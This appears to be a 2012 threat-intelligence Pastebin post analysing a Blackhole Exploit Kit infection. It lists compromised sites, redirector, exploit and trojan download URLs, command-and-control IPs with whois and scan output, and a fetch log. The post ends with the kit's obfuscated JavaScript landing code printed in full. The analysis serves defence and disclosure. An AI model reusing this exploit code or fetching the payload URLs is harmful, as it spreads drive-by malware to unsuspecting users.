Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =====================================================
- #MalwareMustDie!!!!!!!!!!!! | Sat Oct 27 18:29:21 JST 2012
- FreeBSD unixfreaxjp 9.0-RELEASE-p4 FreeBSD 9.0-RELEASE-p4 #
- This is the large infection of BHEK2 hinted by @xxxxrxero followed by @unixfreaxjp
- Hit by MDAC Exploit Infection & Downloaded the Trojan, Backdoor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
- I am pretty sure this one as ZeuS, since Detection Ratio of VT still too low.
- url: h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
- Also drops other troj: h00p://4.icedambusters.com/adobe/update_flash_player.exe
- Referer are to: 74.200.211.205
- CNC: 198.143.159.66
- After infected by 03ab326.exe it also dwonloaded THREE MORE TROJANS from:
- h00p://springbackcolorado.com/CaBPXFg.exe
- h00p://180degrees.org.nz/cXbAC.exe
- h00p://weareseasons.com/7yoZf5.exe
- PluginDetect VT(5/44): h00ps://www.virustotal.com/file/ebf5a59e4f7212cca87a6b6bf9d646189674f40c3d0f765a2adf62b9ba0a9ca4/analysis/1351330706/
- Troj Downloader VT(8/44): h00ps://www.virustotal.com/file/94258a10d190c941b697246453974bd892f63c77880073674ee1759fa550f5b8/analysis/1351330579/
- The Trojan Zbot(Main) VT(4/44): h00ps://www.virustotal.com/file/166c1a35cf4f24e3678ad0d2c863b95d8a49448915bfcf31eccb5412d9b1ca8e/analysis/1351330452/
- ======================================================
- ========================
- INFECTIONS SCHEME
- ========================
- #include Hint: HINT.TXT;
- ---------------------------------------------------------------------------------------------------------------------------...
- LANDING PAGE JS.JS PLUGIN DETECT OBFS
- ---------------------------------------------------------------------------------------------------------------------------...
- h00p://50.63.137.176/8jorLtGh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://a1stopshop.in/DAE4v3m/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://acura.hightestonline.com/2cE8GLPY/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://agriculturaenmarcha.com/5tNBJdC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://blt-photography.com/9UEazEmw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://cefoai.com/9TFzUf/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://churchjef.com/3Mn4rs/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://elefti.com/4yxcpfn/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://estoesxicotepec.com.mx/1dKmuBp8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://financialportal.co.za/1G6V26b/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://kocaudio.com/yaxF05nC/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
- h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://agritech.com.ve/MtkRFd3k/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
- h00p://infotrex.com/bq9MGi/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://interambiente.altervista.org/88DTb1S7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://littlecreekinc.com/9LAfwJz/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://motosikletsasesi.com/11qX8KCB/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://netguandisenoweb.com/1fp3PP/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://new.artofimagination.com/5dLS24/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://oneryavuz.com/abMBVR/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://optikcim.com/5RRvjA8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://ortizplans.com/43wKes/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://pose-frette.gmxhome.de/66jzk4q/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://potter.com.hk/6UTxen/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://rajiv.stealbackyourppcprofits.com/AtdNGGH/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://rapblast.com/Af1Msc/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://safeguardlcs.com/M90nh9/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://sanypet.it/7hKxQao/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://southsnetball.asn.au/21drY7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://superiorshine-carwash.com/5M2M4Mh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://testsites1.com/9bMNvy/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://trailblazers.org/8AvgUm/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://tranzzactn.com/075V7po/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://ventanasdesanmiguel.net/3ADRuw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://www.alicil.com/0yUWvU/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://www.emiliacenterdownload.com/3p9rovT/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://www.jonespark.com/46YdTk/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://www.prettyleg.idv.tw/dvYhPu/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://www.rosesocietyjbp.com/1xt74Jy1/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://yesilhoca.com/09DFUG7F/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- h00p://zalesie-gorne.home.pl/0qU3MX/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
- ==================================
- INFECTOR DETAILS;
- 74.200.211.205
- ==================================
- NetRange: 74.200.192.0 - 74.200.255.255
- CIDR: 74.200.192.0/18
- OriginAS: AS16805, AS22576
- NetName: LAYERED-TECH-CHI
- NetHandle: NET-74-200-192-0-1
- Parent: NET-74-0-0-0-0
- NetType: Direct Allocation
- RegDate: 2006-11-14
- Updated: 2012-02-24
- Ref: h00p://whois.arin.net/rest/net/NET-74-200-192-0-1
- OrgName: Layered Technologies, Inc.
- OrgId: LAYER-3
- Address: 5085 W Park Blvd
- Address: Suite 700
- City: Plano
- StateProv: TX
- PostalCode: 75093
- Country: US
- RegDate: 2004-07-21
- Updated: 2010-08-13
- Comment: Please send all abuse complaints to abuse@layeredtech.com
- Ref: h00p://whois.arin.net/rest/org/LAYER-3
- PORT STATE SERVICE
- 21/tcp open ftp
- 25/tcp open smtp
- 26/tcp closed unknown
- 53/tcp open domain
- 80/tcp open h00p
- 110/tcp open pop3
- 143/tcp closed imap
- 443/tcp open h00ps
- 587/tcp open submission
- 993/tcp closed imaps
- 995/tcp closed pop3s
- No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
- TCP/IP fingerprint:
- SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B9336%O=21%C=26)
- TSeq(Class=TR%IPID=I%TS=0)
- T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
- T2(Resp=N)
- T3(Resp=N)
- T4(Resp=N)
- T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
- T6(Resp=N)
- T7(Resp=N)
- PU(Resp=N)
- ==================================
- CNC / CONTROL DETAILS;
- IP: 198.143.159.66
- ==================================
- IP: 198.143.159.66
- NetRange: 198.143.128.0 - 198.143.191.255
- CIDR: 198.143.128.0/18
- OriginAS: AS32475
- NetName: SINGLEHOP
- NetHandle: NET-198-143-128-0-1
- Parent: NET-198-0-0-0-0
- NetType: Direct Allocation
- RegDate: 2012-05-16
- Updated: 2012-05-16
- Ref: h00p://whois.arin.net/rest/net/NET-198-143-128-0-1
- OrgName: SingleHop, Inc.
- OrgId: SINGL-8
- Address: 621 W. Randolph St.
- Address: 3rd Floor
- City: Chicago
- StateProv: IL
- PostalCode: 60661
- Country: US
- RegDate: 2007-03-07
- Updated: 2010-03-23
- Comment: h00p://www.singlehop.com/
- Ref: h00p://whois.arin.net/rest/org/SINGL-8
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open h00p
- 135/tcp filtered msrpc
- 136/tcp filtered profile
- 137/tcp filtered netbios-ns
- 138/tcp filtered netbios-dgm
- 139/tcp filtered netbios-ssn
- 445/tcp filtered microsoft-ds
- No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
- TCP/IP fingerprint:
- SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B94D1%O=22%C=1)
- TSeq(Class=TR%IPID=Z%TS=1000HZ)
- T1(Resp=Y%DF=Y%W=3890%ACK=S++%Flags=AS%Ops=MNNTNW)
- T2(Resp=N)
- T3(Resp=N)
- T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
- T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
- T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
- T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
- PU(Resp=Y%DF=N%TOS=0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
- ============================================
- Grab the pluginDetect & you get the CNC!
- ============================================
- $ myfetch --h00p_proxy=yes
- --user-agent="Mozila/4.3(X11; U; MacOSX)"
- --cookies=on --keep-session-cookies --save-cookies mycookies.txt
- --referer="h00p://74.200.211.205/SQeyUUzT/js.js" "
- --target="h00p://ser.luckypetspetsitting.com/links/return-west.php"
- // w/tor
- --16:21:02-- h00p://ser.luckypetspetsitting.com/links/return-west.php
- => `return-west.php'
- Connecting to 192.168.7.11:8118... connected.
- Proxy request sent, awaiting response... 502 Bad Gateway
- 16:21:14 ERROR 502: Bad Gateway.
- // gatling IP
- --16:21:34-- h00p://ser.luckypetspetsitting.com/links/return-west.php
- => `return-west.php'
- Resolving ser.luckypetspetsitting.com... 198.143.159.66
- Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 16:21:37 (131.58 KB/s) - `return-west.php' saved [28878]
- ============================
- DECODING ANALYSIS
- ===========================
- //Wepawet OK, jsunpack BAD, Malzilla OK, Revello BAD, SteamDumper OK
- <html><head><title></title></head><body><div dqa="asd"></div><script>p=eval("p"+"arseInt");function asd(){return document.getElementsByTagName("span")[0];}function asd2(){return q.getAttribute(i);}function asd3(){a+=String.fromCharCode(p(s.substr(i,2),24));}function asd4(){eval(a);}zxc=(020==0x10);</script><span 34="1k431m48(414e444c45@4i1g431m4i&4l4e3f3446+4l4e434j1k%431h1h551k)494e494k2a#464l4e434k*494f4e1g44!1h534m414i^18432d4k48_494j1k421k$441k412d53(4j4k414k4l@4j2a1l231k&4g4c4l4749+4e2a20552b%49461g1943)1m494j3b4k#4i494e471g*441h1h534i!454k4l4i4e^1841554946_1g441m4c45$4e474k482d(2d211h5343@1m47454k3e&454i4" 80="2d#1a291a5545*4c4j455349!461g471m4g^4c4l47494e_30414j3549$4d453c514g(451g421k1a@414g4g4c49&43414k494f+4e1n4m4e44%1m41444f42)451m501l4d#414i4j1a1k*411h1h5348!2d1a281a55^5555555545_4c4j455348$2d471m4m45(4i4j494f4e@5549461g19&441m494j2k+4546494e45%441g4e1h1h)534e2d441m#47454k3549*4d452l4e41!424c454438^" 42="555541&1m434c4541+4e4l4g1g1h%2b422d1g46)1m4m454i4j#494f4e5454*461m4m454i!4j494f4e20^1h2b422d42_2f421m4i45$4g4c414345(1g411m4j4g@4c494k364l&4d3a454750+1k411m4745%4k3e454i4j)494f4e2k45#4c494d494k*454i1h2a42!2b4i454k4l^4i4e184255_551k434c45$414e4l4g2a(464l4e434k@494f4e1g1h&53551k4144+443f494e2l%4m454e4" 55="!4454541943^1m47454k2k_37354f424a$1g4d1h1h53(4i454k4l4i@4e181l2255&49461g4a2c+4954544c2c%2054544a2c)205454492c#205454492c*2d431m4g4c!4l47494e3b^4952455454_431m4g4c4l$47494e3b49(52452c211h@534i454k4l&4i4e182055+49461g4c2e%2d491h534i)454k4l4i4e#181l21554k*4i51534946!1g4c2d2d43^1m4g4c4l47_494e3b4952$45" 79="54j43+4i494g4k49%4f4e1h5454)441m47454k#364l4d1g42*1m4e414d45!1h2b482d44^1m47454k38_4c4l47494e$2m494c453e(454i4j494f@4e1g421k48&1h2b49461g+19481e1e44%1m373b2d2d)211h534946#1g471m4g4c*4l47494e30!414j35494d^453c514g45_1g421k1a41$4g4g4c4943(414k494f4e@1n4m4e441m&41444f4245+1m4g444650%4d4c1a1k41)1h1h5348" 89="421m4j4k(4i1a1k1a45@414d1a1h1k&1a1a1h1k4i+41212d4i41%231m2j4i45)414k453742#4a45434k1g*1a3b48454c!4c1m2h4g4g^4c4943414k_494f4e1a1k$1a1a1h1k4i(41222d4i41@231m2j4i45&414k453742+4a45434k1g%1a4d4j504d)4c221m3g35#34303c3c38*1a1k1a1a1h!2b4k4i5153^4i41221m4f_4g454e1g1a$2n2l3c1a1k(1a484k4k4g@2a1n1n4j45&4i1m4" 44="!482l4m454e^4k1g1a4f4e_1a1j441k43$1h55454c4j(4553422d41@3j1a4f4e1a&1j443l2b41+3j1a4f4e1a%1j443l2d45)1m4n494e30#414e444c45*4i1g431k42!1h55555555^1k4n494e30_414e444c45$4i2a464l4e(434k494f4e@1g441k431h&534i454k4l+4i4e18464l%4e434k494f)4e1g1h5344#1g1h2b4946*1g4k514g45!4f4618432d^2d1a464l4e_434k494f4e$1a" 69="1j#231h1j1a4g*501a1k1a4c!494e453045^4947484k1a_1k1g4b1m4g$4c4l47494e(3b4952451j@231h1j1a4g&501a1k1a4m+454i4k4943%414c2h4c49)474e1a1k1a#42414j454c*494e451a1k!1a44494j4g^4c41511a1k_1a424c4f43$4b1a3l1h1h(2b49461g19@4a1h534b1m&4j454k3b4k+514c451g4b%1m44494m1k)3j1a4g4f4j#494k494f4e*1a1k1a4142!4j4f4c4l4k^" 60="l4d454e@4k1k432d1a&2c1a1k472d+1g4a1m4745%4k2l4c454d)454e4k4j2i#513c414736*414d451g1a!424f44511a^1h3j203l54_544a1m424f$44511h2b49(461g19471h@534k4i5153&4a1m4n4i49+4k451g431j%1f44494m18)49442d1a1f#1j421j1f1a*2e4f1f1j43!1j1a1n4449^4m2e1a1h2b_442d4a1m47$454k2l4c45(4d454e4k2i@5131441g42&1h5543414k+43481g" 8="f4e43414k$1g3j1a201a(1k1a201a1k@1a201a1k1a&201a3l1h2b+464f4i1g41%2d202b412c)242b411j1j#1h5349461g*1n3m1g201j!1h1g1m1j1h^1c1n1m4k45_4j4k1g453j$413l1h1h53(453j413l2d@3a45472l50&4g1m1c2255+49461g412e%435454191g)1n3k441n1h#1m4k454j4k*1g453j413l!1h1h53453j^413l2d1a20_1a55554i45$4k4l4i4e18(451m4j4c49@4345" 6="4d3a%4547501h2b)464f4i1g41#2d202b412c*35414k481m!4d494e1g43^1m4c454e47_4k481k421m$4c454e474k(481h2b411j@1j1h534946&1g471g433j+413l1k2120%1h2e471g42)3j413l1k21#201h1h534i*454k4l4i4e!1821554946^1g471g433j_413l1k2120$1h2c471g42(3j413l1k21@201h1h534i&454k4l4i4e+181l215555%554i454k4l)4i4e182055#1k464f4i4" 28="1a35%4j504d4c22)1m2k37352k#4f434l4d45*4e4k1a1k1a!3549434i4f^4j4f464k1m_3g35342k37$351a1k1a3b(484f434b4n@414m452m4c&414j481m3b+484f434b4n%414m452m4c)414j481a1k#1a3c2k2j2j*4k4c1m3c2k!2j2j4k4c1a^1k1a3b4845_4c4c1m3d31$30454c4g45(4i1a1k1a3b@434i494g4k&494e471m2k+49434k494f%4e414i511a)1k1a4n4d4g#4c4151454" 85="34g44464m$454i2d4g44(464m454i1m@4j4g4c494k&1g1f1m1f1h+55454c4j45%534g44464m)454i2d3j20#1k201k201k*203l55464l!4e434k494f^4e18501g4j_1h53442d3j$3l2b464f4i(1g492d202b@492c4j1m4c&454e474k48+2b491j1j1h%534b2d1g4j)1m4348414i#2j4f44452h*4k1g491h1l!24261h1m4k^4f3b4k4i49_4e471g2126$1h2b49461g(4b1m4c454e@474k" 35="j494f+4e2k454c49%4d494k454i)2d442b4i45#4k4l4i4e18*4155442d44!1m4k4f344f^4n454i2j41_4j451g1h1m$4i454g4c41(43451g1n3k@4j1n471k1a&1a1h2b422d+431m384c4l%47494e4j3j)443l2b4946#1g19425454*19421m4745!4k3e454i4j^494f4e1h53_4i454k4l4i$4e18415541(1m4g4c4l47@494e2d422b&49461g1943+1m494j2k45%46494e4544)1g421m49" 10="c44)1m4c454e47#4k482b421j*1j1h534946!1g411m494j^3b4k4i494e_471g443j42$3l1h1e1e1n(3j3m3k4j3l@1n1m4k454j&4k1g443j42+3l1h1h5346%2d4e414m49)47414k4f4i#1m4d494d45*3c514g454j!3j443j423l^3l2b452d46_2f461m454e$41424c4544(384c4l4749@4e2a202b49&461g451e1e+1g451m4e41%4d45545445)1m44454j43#4i494g4k49*4f4e1h1h53" 16="11h1h53@49461g1947&5454191g47+1m4k454j4k%1g4c1h5454)471m4k454j#4k1g411h1h*1h534i454k!4l4i4e1846^555555554i_454k4l4i4e$1820551k47(454k384c4l@47494e2m49&4c453e454i+4j494f4e2a%464l4e434k)494f4e1g46#1k421h534m*414i18482d!4k48494j1k^451k441k47_1k411k432d$1l212b4946(1g481m373b@2e22545419&4654541946+1m4m45" 78="494d452l(4e41424c45@44384c4l47&494e1g471m+4d494d453c%514g451k41)1h2b49461g#194a1h534e*2d42554946!1g19421e1e^441m48414j_35494d453c$514g451g47(1m4d494d45@3c514g451h&1h53422d44+1m46494e44%36414m384c)4l47494e1g#411k201h55*49461g421h!53471m4e41^4m384c4l47_494e37424a$2d422b482d(441m47454k@364l4d1g42&1m444" 52="j413l2b49$461g421e1e(421m464l4e@434j1h5349&461g421m37+3c2m2d2d23%1h534i454k)4l4i4e5549#461g421m46*4l4e434j1m!4c454e474k^481e1e421m_464l4e434j$3j421m464l(4e434j1m4c@454e474k48&1l213l192d+2d4e4l4c4c%1h534i454k)4l4i4e5555#55464f4i1g*412d202b41!2c431m2k37^362l464l4e_434j1m4c45$4e474k482b(411j1j1h53@431m" 36="4e#4j4k414c4c*45441h1h53!421m494e4j^4k414c4c45_442d4e4l4c$4c2b421m4m(454i4j494f@4e2d4e4l4c&4c2b421m4m+454i4j494f%4e202d4e4l)4c4c2b421m#47454k3e45*4i4j494f4e!2k4f4e452d^4e4l4c4c2b_421m4g4c4l$47494e3641(4d452d4455@431m47414i&424147452d+46414c4j45%2b49461g43)1m494j312l#1e1e19431m*2h434k494m!453g2l4e41^" 49="4364f44@454j3j483l&2b4k4i5153+431m4i454d%4f4m452j48)494c441g47#1h5543414k*43481g461h!5355555549^461g431h53_4k4i515344$1m44494m1m(4i454d4f4m@452j48494c&441g431h55+43414k4348%1g461h5355)5555554946#1g19441m44*494m1h5341!2d444f434l^4d454e4k1m_47454k2l4c$454d454e4k(2i5131441g@441m44494m&312k1h2b49+461g41" 70="451a1k1a4i_4947484k1a$1k1a204g50(1a1k1a4k4f@4g1a1k1a20&4g501a3l1h+2b4b1m494e%4j454i4k2k)494m314e2i#4f44511g4b*1m44494m1h!555549461g^4b1m44494m_1e1e4b1m44$494m1m4g41(4i454e4k36@4f44451h53&4b1m4j454k+3b4k514c45%1g4g1k431m)434f4e4341#4k1g3j1a46*4f4e4k3b49!52451a1k1g^4b1m4g4c4l_47494e3b49$52451j231h(1j1" 1="4e184k51(4g454f4618@42192d1a4l&4e44454649+4e45441a55%1k494j2h4i)4i41512a46#4l4e434k49*4f4e1g421h!534i454k4l^4i4e1g1n41_4i4i41511n$491h1m4k45(4j4k1g3742@4a45434k1m&4g4i4f4k4f+4k514g451m%4k4f3b4k4i)494e471m43#414c4c1g42*1h1h551k49!4j2m4l4e43^2a464l4e43_4k494f4e1g$421h534i45(4k4l4i4e18@4k514g454f&46184" 30="g491h2b43$1m4m454i2n(45434b4f2d@431m494j2n&45434b4f2f+431m464f4i%4d414k364l)4d1g1g1n4i#4m3k4j1i3k*2a3k4j1i1g!3j3k1m3k1k^3k443l1j1h_1n491h1m4k$454j4k1g49(1h2f3a4547@2l504g1m1c&212a1a201m+291a1h2a4e%4l4c4c2b43)1m494j2j48#4i4f4d452d*1g1n2j484i!4f4d453k4j^1i3k1n3k4j_1i1g3k443j$3k443k1m3l(1i1h1n491h@1m4k" 31="454j4k&1g491h2b43+1m4m454i2j%484i4f4d45)2d431m494j#2j484i4f4d*452f431m46!4f4i4d414k^364l4d1g3a_45472l504g$1m1c211h2a(4e4l4c4c2b@431m494j3b&4146414i49+2d1g1g1n2h%4g4g4c451n)491h1m4k45#4j4k1g471h*54541g1947!1e1e19431m^494j2j484i_4f4d451h1h$1e1e1g1n3b(4146414i49@3k4j1i3k1n&3k4j1i1g3k+443j3k443k%1m3l1i1" 22="!1g431k421h^555555551k_494e494k3b$434i494g4k(2a464l4e43@4k494f4e1g&1h534m414i+18432d4k48%494j1k412d)4e414m4947#414k4f4i1k*452d1a1n1a!1k461k492d^411m4l4j45_4i2h47454e$4k54541a1a(1k472d411m@4m454e444f&4i54541a1a+1k422d411m%4g4c414k46)4f4i4d5454#1a1a1k482d*411m4g4i4f!444l434k54^541a1a2b43_1m494e494k$37" 53="43414c&4c2h4i4i41+511g431m2k%37362l464l)4e434j1h55#431m454d4g*4k512k494m!1g1h551k47^454k3f4944_4k482a464l$4e434k494f(4e1g431h53@49461g431h&534m414i18+412d431m4j%434i4f4c4c)3f49444k48#5454431m4f*46464j454k!3f49444k48^1k422d4k48_494j2b4946$1g421m494j(364l4d1g41@1h1h534i45&4k4l4i4e18+4155554i45%4k4l4i4" 77="!1g19441m49^4j312l1h53_412d1a2h44$4f42451m1i(382k2m1m1i@384c4l471l&2f494e542h+444f42451m%1i2h434i4f)42414k1m1i#384c4l471l*2f494e542h!444f42451m^1i3a454144_454i1m1i38$4c4l471l2f(494e1a2b49@461g471m47&454k3e454i+4j494f4e2k%4f4e45192d)2d201h5347#1m47454k3e*454i4j494f!4e2k4f4e45^2d202b422d_441m47454k$35" 33="!3k1m2f3k44^1i1h1n491h_1m4k454j4k$1g491h2b43(1m4m454i37@4g454i412d&431m494j37+4g454i411e%1e1g1g1n3e)454i4j494f#4e3k4j1i3k*1n3k4j1i1g!3k441j3k1m^2f3k441i1h_1n491h1m4k$454j4k1g49(1h5454211h@2f4g414i4j&452m4c4f41+4k1g3a4547%2l504g1m1c)211k21201h#2a4e4l4c4c*2b431m4144!443f494e2l^4m454e4k1g_1a4c4f4144$1a" 86="482d2d&211h4b2d1a+201a1j4b2b%441m4g4l4j)481g4b1h2b#552b4i454k*4l4i4e1844!1m4a4f494e^1g1a1a1h2b_55454e443n$4i4544494i(45434k2d46@4l4e434k49&4f4e1g1h53+4n494e444f%4n1m4c4f43)414k494f4e#1m484i4546*2d1f484k4k!4g2a1n1n24^1m49434544_414d424l4j$4k454i4j1m(434f4d1n41@444f42451n&4l4g44414k+453n464c41%4j483n4" 84="7*494e2k454k!45434k1m49^4e494k3b43_4i494g4k1g$1h2b384c4l(47494e2k45@4k45434k1m&47454k3e45+4i4j494f4e%1g1a1m1a1h)2b4g44464m#454i2d384c*4l47494e2k!454k45434k^1m47454k3e_454i4j494f$4e1g1a2h44(4f42453a45@4144454i1a&1h2b554341+4k43481g45%1h53554946)1g4k514g45#4f46184g44*464m454i2d!2d1f4j4k4i^494e471f1h_5" 82="62d1g42@5454441m47&454k2k3735+4f424a1g44%1m494e4j45)4i4k303c35#341g1a4f42*4a45434k1a!1k3j1a434c^414j4j4944_1a1k471m43$4c414j4j31(2k3l1k3j1a@4j4i431a1k&1a1a3l1k1a+1a1k471h1h%1h1m2n454k)3e454i4j49#4f4e4j1g1h*2b464f4i1g!4d2d202b4d^2c252b4d1j_1j1h534946$1g431m4k45(4j4k1g461h@1e1e1g1948&54543a4547+2l504g" 50="1h53%441m44494m)2d41555549#461g441m44*494m1e1e44!1m44494m1m^4g414i454e_4k364f4445$1h534k4i51(53441m4449@4m1m4g414i&454e4k364f+44451m4i45%4d4f4m452j)48494c441g#441m44494m*1h5543414k!43481g461h^5355441m44_494m2d4e4l$4c4c55551k(2k37362l46@4l4e434j2a&3j3l1k4f4e+2k4f4e452l%4d4g4k512k)494m2a464l#4e434k494" 47="42#1k411m3f34*464l4e434j!1h5555551k^44494m2a4e_4l4c4c1k44$494m312k2a(1a4g4c4l47@494e44454k&45434k1a1k+44494m3f49%444k482a25)201k4g4c4l#47494e3b49*52452a211k!454d4g4k51^2k494m2a46_4l4e434k49$4f4e1g1h53(4m414i1844@2d4k48494j&1k421k481k+431k411k46%1k472b4946)1g441m4449#4m1e1e441m*44494m1m43!48494c4436^" 58="1e#411h53441m*44494m1m46!4f434l4j1g^1h55554341_4k43481g46$1h53554i45(4k4l4i4e18@422f431m46&494i4j4k2j+48494c442a%4e4l4c4c55)1k4j454k3b#4k514c452a*464l4e434k!494f4e1g42^1k471h534m_414i18462d$421m4j4k51(4c451k411k@441k432d4k&48494j2b49+461g461e1e%471h53464f)4i1g412d20#2b412c471m*4c454e474k!482b412d41^" 57="l4e4k+2d42554946%1g421l4d1m)434f4l4e4k#2e2d21201h*534i454k4l!4i4e182155^5555554341_4k43481g46$1h53554i45(4k4l4i4e18@20551k4745&4k2k37354f+424a2a464l%4e434k494f)4e1g471k41#1h534m414i*18461k442d!4k48494j1k^432d472f47_1m4j4g414e$2a201k422d(431e1e431m@46494i4j4k&2j48494c44+2f212a202b%4k4i515349)461g421e" 87="g4c)4151454i1m#4550451f2b*552b4n494e!444f4n1m4f^4e4245464f_4i454l4e4c$4f41442d46(4l4e434k49@4f4e1g1h53&4i454k4l4i+4e181a1a2b%552b4k4i51)534m414i18#4i41242d1a*1m1n1n1m1m!1n1n202341^422322261m_4550451a1k$4i41232d44(4f434l4d45@4e4k1m434i&45414k452l+4c454d454e%4k1g1a4f42)4a45434k1a#1h2b4i4123*1m4j454k2h" 81="4c4l47494e_1g4b1k411h$55471m494e(4j4k414c4c@45442d4e1e&1e482f212a+1g4e2f202a%1g471m4e41)4m384c4l47#494e37424a*2f1l201m22!2a1l211h1h^55454c4j45_53422d441m$47454k2h3g(371g471m4g@4i4f47312k&3j203l1h54+54441m4745%4k2h3g371g)471m4g4i4f#47312k3j21*3l1h2b432d!1n2d3k4j1i^1g3j3k443k_1m3l1j1h1n$472b4k4i51(534" 12="1a1h2a20(1k412d4e41@4m4947414k&4f4i1m4g4c+4l47494e4j%1k472d1a1a)1k461k421k#4d2b464f4i*1g462d202b!462c411m4c^454e474k48_2b461j1j1h$534d2d413j(463l1m4445@4j434i494g&4k494f4e54+54472b422d%413j463l1m)4e414d4554#54472b4946*1g1g481m4k!454j4k1g4d^1h1e1e1g19_445454441m$4k454j4k1g(3a45472l50@4g1m4c4546&4k2j4" 